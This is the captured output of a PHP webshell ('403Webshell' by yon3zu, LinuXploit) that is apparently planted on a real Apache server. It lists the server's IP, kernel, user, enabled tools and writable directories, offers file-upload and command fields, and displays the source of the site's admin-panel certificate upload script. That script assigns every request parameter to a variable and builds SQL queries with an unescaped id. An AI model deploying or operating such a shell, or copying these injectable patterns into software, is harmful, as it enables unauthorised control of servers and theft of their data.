403Webshell
Server IP : 103.234.187.230  /  Your IP : 216.73.216.216
Web Server : Apache
System : Linux lserver42043-ind.megavelocity.net 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
User : apache ( 48)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/rsdgroup/adminPanel/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /var/www/html/rsdgroup/adminPanel/write_certificate.php
<?php
include_once("session.php");
include_once("settings.php");
foreach ($_REQUEST as $key => $value) {
	$$key = $value;
}

$cnt = count($_FILES['certImage']['name']);

function uploadPhoto($fileName,$i){
	$tmp_name = $_FILES[$fileName]["tmp_name"][$i];
	$photoName = $_FILES[$fileName]["name"][$i];
	$photoName = ereg_replace("[^A-Za-z0-9.]", "", $photoName);
	$photoNameArr = explode(".",$photoName);
	$fileExt = strtolower($photoNameArr[count($photoNameArr)-1]);
	unset($photoNameArr[count($photoNameArr)-1]);
	$photoNameWithoutExt = implode("_",$photoNameArr);
	$img1New = $fileName.(time()+$i).".".$fileExt;
	if($fileExt == "png" || $fileExt == "jpg" || $fileExt == "jpeg" || $fileExt == "gif" ){
		move_uploaded_file($tmp_name, "../cat_images/certificates/".$img1New.""); 
		return  $img =  $img1New ;
	}
	else{  
		$img =''; 
		return 0;
	}
}

if($_REQUEST['mode']=="Edit"){
	$sql = sprintf("UPDATE `tblCertificate` SET `heading` ='%s' ,`description`='%s',`createdOn`= unix_timestamp() where `id` =".$id." LIMIT 1",
	mysql_real_escape_string(@$certificate),
	mysql_real_escape_string(@$description));
	$result	=	mysql_query($sql) or die(mysql_error());

	for($i=0;$i<$cnt;$i++){
		$j = $i+1;
		if($_FILES['certImage']['error'][$i] == 0){			
			$sql		=	"SELECT pic".$j." FROM `tblCertificate` WHERE `id` = '".$id."' LIMIT 1";
			$resset		=	mysql_query($sql) or die(mysql_error());
			$result		=	mysql_fetch_assoc($resset);
			$numrows	=	mysql_num_rows($resset);
			if($numrows > 0){
				@unlink("../../cat_images/certificates/".$result['pic'.$j]);
				$banner = uploadPhoto('certImage',$i);
			}
			else{
				$banner = uploadPhoto('certImage',$i);
			}
			if($banner != ''){
				$query= "UPDATE `tblCertificate` SET pic".$j." = '".$banner."' WHERE `id` = ".$id." LIMIT 1";
				$result	=	mysql_query("$query") or die(mysql_error());
			}
		}
		else{
			$err = $err + 1;
		}
	}
}
else{
	$query	=	sprintf("INSERT into `tblCertificate` ( `heading`,`description` ,`createdOn`)
	VALUES('%s','%s',unix_timestamp())",		
	mysql_real_escape_string($certificate),
	mysql_real_escape_string($description));
	$result	=	mysql_query($query) or die(mysql_error());
	
	$lastId = mysql_insert_id();
	
	for($i=0;$i<$cnt;$i++){
		$j = $i+1;
		if($_FILES['certImage']['error'][$i] == 0){
			//echo $_FILES['test']['name'][$i]."<br>";
			$banner = uploadPhoto('certImage',$i);
			if($banner != ''){
				$query= "UPDATE `tblCertificate` SET pic".$j." = '".$banner."' WHERE `id` = ".$lastId." LIMIT 1";
				$result	=	mysql_query("$query") or die(mysql_error());
			}
		}
		else{
			$err = $err + 1;
		}
	}
}
?>
<script>
	document.location="certificate_list.php?page=listCertificates";
</script>

Youez - 2016 - github.com/yon3zu
LinuXploit